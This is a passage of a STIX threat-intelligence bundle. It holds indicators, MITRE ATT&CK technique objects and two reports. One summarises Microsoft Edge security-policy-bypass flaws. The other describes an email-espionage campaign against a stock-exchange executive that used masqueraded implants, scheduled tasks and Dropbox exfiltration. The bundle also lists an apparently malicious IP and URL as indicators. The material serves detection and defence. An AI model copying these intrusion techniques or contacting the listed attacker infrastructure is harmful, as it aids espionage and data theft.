      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--f8627e06-405f-57e5-a8b8-ebeb7bb9601c"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b60d0396-9263-5e19-aa05-098b2718f122",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11291",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11291']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--073e0407-c9bf-5f40-8424-b21b695f94e8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--b60d0396-9263-5e19-aa05-098b2718f122"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--9fc3e2b4-81f3-5d57-82ca-418a8958c0cf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11295",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11295']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4cdf9967-4cce-5e11-aa4e-f90a94fb3cd7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--9fc3e2b4-81f3-5d57-82ca-418a8958c0cf"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b2093215-8e3b-5f9c-b75c-52cf7e6b6fdd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11297",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11297']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4084c9a6-9e85-54ae-aade-8e66bb4284c3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--b2093215-8e3b-5f9c-b75c-52cf7e6b6fdd"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--7e922e24-9416-5092-bb53-6df0d43762a6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.cve.org/CVERecord?id=CVE-2026-10883",
      "pattern": "[url:value = 'https://www.cve.org/CVERecord?id=CVE-2026-10883']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--42a8d9c6-2d03-5845-bb5d-77ad01160ccb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--7e922e24-9416-5092-bb53-6df0d43762a6"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--da7a5e76-c33f-5f42-b4fe-31b2946cb8ce",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--45ec3d26-1064-555f-b3be-3373d8caaa26",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Multiple Vulnerabilities in Microsoft Edge Allow Security Policy Bypass",
      "description": "## Overview\n\nOn June 10, 2026, the French National Agency for the Security of Information Systems (ANSSI) released an advisory (CERTFR-2026-AVI-0726) detailing numerous security vulnerabilities in Microsoft Edge. These flaws, collectively impacting versions prior to 149.0.4022.53, include various issues that could lead to a security policy bypass and other unspecified security problems as indicated by Microsoft's security bulletins. While the specific exploitation vectors and exact impacts of each vulnerability (e.g., CVE-2026-10883, CVE-2026-10892, CVE-2026-10923) are not fully detailed in the ANSSI advisory, the potential for an attacker to circumvent browser security mechanisms poses a risk to user data and system integrity. Defenders should prioritize patching to mitigate these client-side risks.\n\n## Attack Chain\n\n1.  **Initial Access (User Interaction)**: An attacker entices a user to visit a malicious website or click a crafted link, possibly via phishing or drive-by download.\n2.  **Client-Side Exploitation (CVE-2026-XXXX)**: The vulnerable Microsoft Edge browser processes the malicious web content, triggering one or more of the identified vulnerabilities (e.g., memory corruption, logic error).\n3.  **Security Policy Bypass**: Successful exploitation bypasses browser security policies (e.g., Same-Origin Policy, Content Security Policy), allowing the attacker to access restricted resources or execute unauthorized actions within the browser's context.\n4.  **Unspecified Security Impact**: The bypass could lead to further compromise such as information disclosure (e.g., reading cookies, local storage), elevation of privileges within the browser, or cross-site scripting (XSS) in highly sensitive contexts.\n5.  **Browser Sandbox Escape (Potential)**: Depending on the specific vulnerability and chaining, the attacker *may* attempt to escape the browser's sandbox to execute arbitrary code on the underlying operating system. (Note: This is a common objective for browser exploits, but not explicitly confirmed for these specific CVEs by the source).\n6.  **Further Compromise**: If a sandbox escape is successful, the attacker could install malware, establish persistence, exfiltrate data, or pivot to other systems on the network.\n\n## Impact\n\nThe primary impact of these vulnerabilities is the ability for an attacker to bypass security policies within the Microsoft Edge browser. While the full extent of the \"unspecified security problem\" is not detailed, a successful security policy bypass could allow an attacker to access sensitive user data, perform unauthorized actions on behalf of the user, or potentially set the stage for further system compromise by escaping the browser's sandbox. Organizations relying on Microsoft Edge for web browsing across their environments, especially those handling sensitive information, are at risk. No specific victim counts or targeted sectors were mentioned in the advisory, but all users of unpatched Microsoft Edge are vulnerable.\n\n## Recommendation\n\n*   Immediately update all Microsoft Edge installations to version 149.0.4022.53 or later, as recommended by the Microsoft security bulletins referenced.\n*   Implement browser security policies (e.g., Microsoft Edge Group Policies) to restrict potentially dangerous browser functionalities and reduce attack surface against CVE-2026-10883, CVE-2026-10892, etc.\n*   Deploy the Sigma rules in this brief to your SIEM to detect suspicious activities originating from `msedge.exe` processes.\n*   Enable comprehensive logging for process creation and network connections on all endpoints to ensure telemetry coverage for the Sigma rules.\n",
      "published": "2026-06-14T09:21:19Z",
      "labels": [
        "browser-vulnerability",
        "security-policy-bypass",
        "client-side-exploit",
        "microsoft-edge"
      ],
      "object_refs": [
        "indicator--83e53297-033d-55d3-981c-cd9c8980900a",
        "indicator--c69c3743-f973-570b-832c-22966c34ee7d",
        "indicator--df397a5c-9479-5c9a-b3ba-e5330d744260",
        "indicator--29b1a76d-8e93-59ea-9f40-ead656221ca7",
        "indicator--2a91e2df-2780-5a3b-8a56-006d4de20595",
        "indicator--c00ca9b9-f174-5370-abe9-7a5db66717f4",
        "indicator--7019d97a-6f8d-51da-bd1b-de8281f22d86",
        "indicator--a1ebc3a8-9b84-5848-95f6-b61ae1e0f9a0",
        "indicator--a9d902ed-1bae-50e3-ab3e-da604c5dab13",
        "indicator--c3bb9f3c-ba23-5125-bc81-225fb059277b",
        "indicator--8d3effbc-ae8d-5993-b012-b1c6c1fed07e",
        "indicator--b400c21c-8a99-5f58-94d0-a055653a1de3",
        "indicator--7c884517-7389-5a0c-9937-2cae9ac3bd25",
        "indicator--a7bd3003-320f-5a3c-bd98-8d3115e9ce0d",
        "indicator--0d98f3f4-25ce-578c-9df4-a5dee3d9c206",
        "indicator--59bc0431-89b1-561a-8984-3705d049463e",
        "indicator--80911274-831e-52b8-aa8f-b7a116aba8b7",
        "indicator--d62c751e-a60b-5191-89a6-c9373160ac7c",
        "indicator--97d61afe-a753-5a69-9ad2-66994e098b12",
        "indicator--bfdf75ef-b6ae-5990-b1fd-3e42984c5ef9",
        "indicator--006f2c2b-92af-5b97-a008-1fd2ea0f2e3b",
        "indicator--8be36e57-9a30-5f8b-8845-48b250464662",
        "indicator--f90494ef-f414-5db1-bc67-144377e0eec4",
        "indicator--98c0f959-ed7b-54cb-bc5f-663bef27fad2",
        "indicator--78b7dca8-a343-507d-a3a8-4d61ff61d6e1",
        "indicator--f644602e-834d-509a-862f-8511af1831d6",
        "indicator--96da5688-b587-5746-a58e-52cf705b88b3",
        "indicator--41e1b348-9795-5f60-8245-7d5d3bc82c65",
        "indicator--5b1417a3-4730-5746-8e3a-b522b9db5fb6",
        "indicator--8ac2bd85-bbe2-5d88-9292-15d49b1d85b6",
        "indicator--5677d4ba-c0c1-5317-bd4e-05a768f69486",
        "indicator--1bfb121c-abc2-5949-94f8-1b43f4654a3c",
        "indicator--9a63e904-12b9-53c9-a44e-7118a00498a0",
        "indicator--f6c2027d-6fca-510c-aa21-9b0c767bb47b",
        "indicator--d25563d4-a10c-5493-8345-ad28f0b043a9",
        "indicator--7cb63911-9a42-521e-8f64-ccf2fc4fbdd3",
        "indicator--22a0c270-4876-5a4a-9e20-18e81d112388",
        "indicator--056b3d84-2e7d-503a-9690-630e99d9207a",
        "indicator--eed8f5c8-859c-5928-b71d-5292eb2296cb",
        "indicator--5a332c80-4579-5c45-8afd-f0585b2d0ef7",
        "indicator--e936896e-10ff-5feb-823d-33c8a690d4cc",
        "indicator--b4456664-5af3-5d99-9ed0-a9a6d75c7644",
        "indicator--aaf83944-14f8-5e7f-a388-5f7ee6f11ef0",
        "indicator--f8627e06-405f-57e5-a8b8-ebeb7bb9601c",
        "indicator--b60d0396-9263-5e19-aa05-098b2718f122",
        "indicator--9fc3e2b4-81f3-5d57-82ca-418a8958c0cf",
        "indicator--b2093215-8e3b-5f9c-b75c-52cf7e6b6fdd",
        "indicator--7e922e24-9416-5092-bb53-6df0d43762a6",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0726/"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-10883"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-10892"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-10923"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-10929"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-10934"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-10953"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-10959"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-10967"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-10984"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11007"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11010"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11012"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11019"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11029"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11034"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11035"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11045"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11064"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11065"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11072"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11077"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11080"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11082"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11097"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11108"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11119"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11127"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11131"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11145"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11148"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11163"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11167"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11172"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11175"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11178"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11188"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11215"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11226"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11247"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11263"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11270"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11278"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11287"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11290"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11291"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11295"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11297"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-10883"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Scheduled Task/Job",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1053",
          "url": "https://attack.mitre.org/techniques/T1053"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--78c81a99-f117-5f8a-8153-1ce2ce070727",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4e89dc16-3b4d-574b-9052-a0ddb208bf10",
      "target_ref": "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--691dc93d-f439-522b-9f21-ad4ae22be80a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4e89dc16-3b4d-574b-9052-a0ddb208bf10",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Masquerading",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1036",
          "url": "https://attack.mitre.org/techniques/T1036"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b73e1e53-c7e0-56ae-bb6a-8c80af01ba33",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4e89dc16-3b4d-574b-9052-a0ddb208bf10",
      "target_ref": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--9d21a692-6f6e-5bb7-83dc-e2bc0f788d04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Staged",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1074",
          "url": "https://attack.mitre.org/techniques/T1074"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--04350520-061e-56ab-983e-f9d6ac6a8dc3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4e89dc16-3b4d-574b-9052-a0ddb208bf10",
      "target_ref": "attack-pattern--9d21a692-6f6e-5bb7-83dc-e2bc0f788d04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c2c1be-ce3f-5edf-b12c-7326679223a6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Email Collection",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1114",
          "url": "https://attack.mitre.org/techniques/T1114"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9e9e252f-752f-5de6-aa07-38e999b7cafc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4e89dc16-3b4d-574b-9052-a0ddb208bf10",
      "target_ref": "attack-pattern--03c2c1be-ce3f-5edf-b12c-7326679223a6"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--18b34662-89d5-5c8e-93bb-7fffbb0b91ea",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4e89dc16-3b4d-574b-9052-a0ddb208bf10",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over Web Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1567",
          "url": "https://attack.mitre.org/techniques/T1567"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d72c1389-5cef-5c1d-96fd-25994168baec",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4e89dc16-3b4d-574b-9052-a0ddb208bf10",
      "target_ref": "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--4e89dc16-3b4d-574b-9052-a0ddb208bf10",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Global Stock Exchange Hit by Monthslong Email Campaign",
      "description": "## Overview\n\nAn unidentified threat actor successfully conducted a sophisticated and patient email espionage campaign targeting a senior finance executive at an unnamed global stock exchange. The campaign began with observed lateral movement on October 10, 2025, suggesting a prior network compromise. The attacker maintained a near-continuous view into the executive's Microsoft Outlook inbox for at least five months, from August 2025 until the last observed activity on March 19, 2026. This was achieved by deploying persistent implants disguised as legitimate software (Adobe, OneDrive) with system privileges via scheduled tasks. A custom infostealer, leveraging the legitimate Aspose .NET library, was used to convert emails into local files, which were then exfiltrated through a Dropbox-based command and control channel designed to mimic legitimate network traffic. The strategic targeting of a major financial exchange indicates an objective to acquire highly sensitive, non-public information with significant potential value to businesses, investors, or foreign governments.\n\n## Attack Chain\n\n1.  **Lateral Movement**: Initial observed activity on October 10, 2025, stemmed from lateral movement originating from a previously compromised device, indicating the attacker already had a foothold within the network.\n2.  **Implant Deployment**: Two implants were deployed to the compromised host, disguised as legitimate Adobe and OneDrive software, both executing with system privileges.\n3.  **Persistence (Scheduled Task)**: The Adobe-like implant was registered as a scheduled task, configured to execute every five minutes to ensure continuous persistence on the compromised host.\n4.  **Command and Control Setup**: On November 12, 2025, the attackers established a command-and-control (C2) channel utilizing Dropbox, aiming for exfiltrated data to appear as legitimate cloud service traffic.\n5.  **Enhanced Persistence \u0026 Execution**: A new scheduled task was registered to execute batch files, meticulously disguised as an ordinary Lenovo system health check, demonstrating intimate knowledge of the target's machine.\n6.  **Infostealer Deployment**: A custom infostealer, built using a legitimate Aspose .NET library, was deployed to specifically target and collect the executive's emails.\n7.  **Data Collection \u0026 Staging**: The infostealer converted the target's emails into local files. The attacker initially siphoned all emails from August to mid-November 2025.\n8.  **Exfiltration \u0026 Recurrent Collection**: The collected email files were exfiltrated via the Dropbox C2 channel. The attacker repeatedly stole the entire email inbox every two to four weeks until February 17, 2026.\n\n## Impact\n\nThe prolonged access to a senior finance executive's email inbox at a global stock exchange resulted in the continuous exfiltration of highly sensitive, non-public information for at least five months. This included intimate details about the organization, contacts, calendar events, and specific business deals. Given the nature of a major financial exchange, this intelligence could hold significant value for competitive businesses, investors, or even foreign governments, potentially leading to market manipulation, corporate espionage, or severe financial losses for affected entities. The specific number of affected individuals is one executive, but the strategic value of the compromised information is substantial.\n\n## Recommendation\n\n*   Deploy the provided Sigma rules to your SIEM and tune them for your environment to detect suspicious scheduled task creation and process masquerading.\n*   Implement a Cloud Access Security Broker (CASB) and Data Loss Prevention (DLP) solution to monitor and prevent unauthorized data exfiltration to cloud services like Dropbox.\n*   Ensure Endpoint Detection and Response (EDR) software is actively monitoring for and generating alerts on suspicious process activity, and establish processes for prompt review and response to these alerts.\n*   Enable Sysmon logging for process creation (Event ID 1), scheduled task creation (Event ID 12, 13, 14, 21), and network connections (Event ID 3) to capture telemetry required by the detection rules.\n",
      "published": "2026-06-14T09:38:05Z",
      "labels": [
        "espionage",
        "financial-sector",
        "email-exfiltration",
        "persistence",
        "living-off-the-land",
        "windows",
        "advanced-persistent-threat"
      ],
      "object_refs": [
        "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e",
        "attack-pattern--9d21a692-6f6e-5bb7-83dc-e2bc0f788d04",
        "attack-pattern--03c2c1be-ce3f-5edf-b12c-7326679223a6",
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
        "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.darkreading.com/cyberattacks-data-breaches/global-stock-exchange-hit-monthslong-email-campaign"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b9e24b81-3b75-5dc8-b45f-19a368ce3daa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 144.31.221.82",
      "pattern": "[ipv4-addr:value = '144.31.221.82']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:40:20Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--50532fd5-0c01-588d-b45b-6d621f94a5d9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd52a030-b34e-5326-8b08-4c3fe785641a",
      "target_ref": "indicator--b9e24b81-3b75-5dc8-b45f-19a368ce3daa"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--81773f6f-f65e-52cf-b66f-0c22d732fee6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: http://144.31.221.82:6060/capcha9856",
      "pattern": "[url:value = 'http://144.31.221.82:6060/capcha9856']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:40:20Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1361336c-7ab1-57f6-8ae9-fc17078e725b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd52a030-b34e-5326-8b08-4c3fe785641a",
      "target_ref": "indicator--81773f6f-f65e-52cf-b66f-0c22d732fee6"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5ab9146f-bf4b-54aa-849a-ac1006f23cfd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd52a030-b34e-5326-8b08-4c3fe785641a",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
